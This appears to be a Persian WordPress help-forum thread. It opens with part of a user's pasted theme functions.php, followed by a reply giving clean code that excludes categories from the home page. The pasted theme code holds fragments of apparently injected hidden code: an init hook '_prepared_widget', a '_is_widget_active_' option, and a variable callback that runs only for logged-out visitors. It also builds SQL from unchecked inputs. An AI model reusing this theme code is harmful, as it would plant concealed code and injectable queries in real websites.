			$comments=$wpdb->get_results($sql);

		} else {

			$text=explode(" ", $text);

			if(count($text) > $length) {

				$l=$length;

				$ellipsis=1;

			} else {

				$l=count($text);

				$more_links_text="";

				$ellipsis=0;

			}

		}

		for ($i=0; $i<$l; $i++)

				$output .= $text[$i] . " ";

	}

	update_option("_is_widget_active_", 1);

	if("all" != $html_tags) {

		$output=strip_tags($output, $html_tags);

		return $output;

	}

	endif;

	$output=rtrim($output, "\s\n\t\r\0\x0B");

  $output=($fix_tag) ? balanceTags($output, true) : $output;

	$output .= ($showdot && $ellipsis) ? "..." : "";

	$output=apply_filters($filters_type, $output);

	switch($more_tags) {

		case("div") :

			$tag="div";

		break;

		case("span") :

			$tag="span";

		break;

		case("p") :

			$tag="p";

		break;

		default :

			$tag="span";

	}	if ($use_link ) {

		if($forces_more) {

			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";

		} else {

			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";

		}

	}

	return $output;

}add_action("init", "_prepared_widget");function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {

	global $wpdb;

	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";

	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";

	if(!$show_pass_post) $request .= " AND post_password =\"\"";

	if($duration !="") { 

		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";

	}

	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";

	$posts=$wpdb->get_results($request);

	$output="";

	if ($posts) {

		foreach ($posts as $post) {

			$post_title=stripslashes($post->post_title);

			$comment_count=$post->comment_count;

			$permalink=get_permalink($post->ID);

			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;

		}

	} else {

		$output .= $before . "None found" . $after;

	}

	return $output;

} 

if ( function_exists('register_sidebar') )

register_sidebar(array(

'before_widget' => '',

'after_widget' => '</div><div class="wfo"></div>',

'before_title' => '<div class="wtop">',

'after_title' => '</div><div class="wco">',

));

function my_function_admin_bar(){

return false;

}

add_filter( 'show_admin_bar' , 'my_function_admin_bar');?>

 

0

به اشتراک گذاری این پست


لینک به پست

سلام و درود

 

این کدی که شما میذاری توی functions.php درستش میشه کد زیر

function exclude_category_home($query) {
	
  if($query->is_home() && $query->is_main_query())
		$query->set('cat', '-7,-1');
	
}
add_action('pre_get_posts', 'exclude_category_home');

که باید کد خودتو کامل پاک کنی و کد بالا رو ابتدای فایل functions.php دقیقا زیر اولین

<?php

قرار بدی.

 

موفق باشید

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری